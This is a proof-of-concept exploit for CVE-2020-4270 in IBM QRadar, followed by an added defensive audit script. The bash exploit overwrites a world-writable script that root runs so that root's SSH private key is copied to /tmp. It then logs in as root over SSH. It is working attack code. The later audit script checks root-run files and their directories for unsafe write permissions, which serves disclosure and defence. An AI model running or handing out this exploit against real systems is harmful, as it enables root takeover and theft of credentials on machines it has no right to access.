Local privilege escalation in QRadar due to run-result-reader.sh insecure file permissions (CVE-2020-4270) proof of concept
#!/bin/bash
# Restore the original script and remove the copied key on Ctrl-C.
trap cleanup INT

function cleanup()
{
    # Put the backed-up original back in place.
    if [ -f /tmp/run-result-reader.sh ]
    then
        /usr/bin/cat /tmp/run-result-reader.sh > /opt/qvm/iem/bin/run-result-reader.sh
        /usr/bin/rm -f /tmp/run-result-reader.sh
    fi
    if [ -f /tmp/id_rsa ]
    then
        /usr/bin/rm -f /tmp/id_rsa
    fi
}

# Back up run-result-reader.sh once, then overwrite it. The overwrite only
# succeeds because the file's permissions allow the current user to write it.
if [ ! -f /tmp/run-result-reader.sh ]
then
    /usr/bin/cp /opt/qvm/iem/bin/run-result-reader.sh /tmp/run-result-reader.sh
    /usr/bin/cat > /opt/qvm/iem/bin/run-result-reader.sh << __EOF__
#!/bin/sh
/usr/bin/cp /root/.ssh/id_rsa /tmp/
/usr/bin/chown nobody.nobody /tmp/id_rsa
__EOF__
fi

echo "Please wait..."
# Poll once a minute until the replaced script has been run with root privileges.
while [ 1 ]
do
    if [ -f /tmp/id_rsa ]
    then
        /usr/bin/ssh -i /tmp/id_rsa root@localhost
        cleanup
        exit 0
    fi
    /usr/bin/sleep 60
done
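
For defenders, an added example (not part of the original gist) that checks for the condition this PoC relies on: a script run with root privileges that a non-root account can overwrite, or swap out through a writable directory. The function names and the optional trusted-UID argument are assumptions of this example, and it requires GNU stat.

```shell
#!/bin/sh
# Added example (not part of the gist): flag a root-executed script that a
# non-root account could overwrite or replace. Requires GNU stat.

# check_node PATH TRUSTED_UID -> 0 if only root/TRUSTED_UID can modify PATH.
check_node() {
    local path="$1" trusted="$2" owner mode rc=0
    owner=$(stat -c '%u' -- "$path")
    mode=$(stat -c '%a' -- "$path")      # octal, e.g. 755 or 1777
    if [ "$owner" -ne 0 ] && [ "$owner" -ne "$trusted" ]; then
        echo "FINDING: $path is owned by uid $owner"
        rc=1
    fi
    # 022 = group-write | other-write. A sticky directory (01000) is exempt:
    # its entries can be removed or renamed only by their owner, the
    # directory's owner, or root.
    if [ $(( 0$mode & 022 )) -ne 0 ]; then
        if [ ! -d "$path" ] || [ $(( 0$mode & 01000 )) -eq 0 ]; then
            echo "FINDING: $path is group/world-writable (mode $mode)"
            rc=1
        fi
    fi
    return "$rc"
}

# audit_script FILE [TRUSTED_UID] -> 0 clean, 1 finding, 2 missing.
# Checks the file and its containing directory: a writable directory lets
# the file be swapped even when the file's own mode is tight. Ancestor
# directories deserve the same check.
audit_script() {
    local file trusted="${2:-0}" rc=0
    [ -e "$1" ] || { echo "MISSING: $1"; return 2; }
    file=$(readlink -f -- "$1")
    check_node "$file" "$trusted" || rc=1
    check_node "$(dirname -- "$file")" "$trusted" || rc=1
    return "$rc"
}

# Path taken from the PoC above, e.g.:
#   sh audit.sh /opt/qvm/iem/bin/run-result-reader.sh
if [ "$#" -gt 0 ]; then audit_script "$@"; fi
```

An exit status of 1 means the file or its directory can be modified by an account other than root.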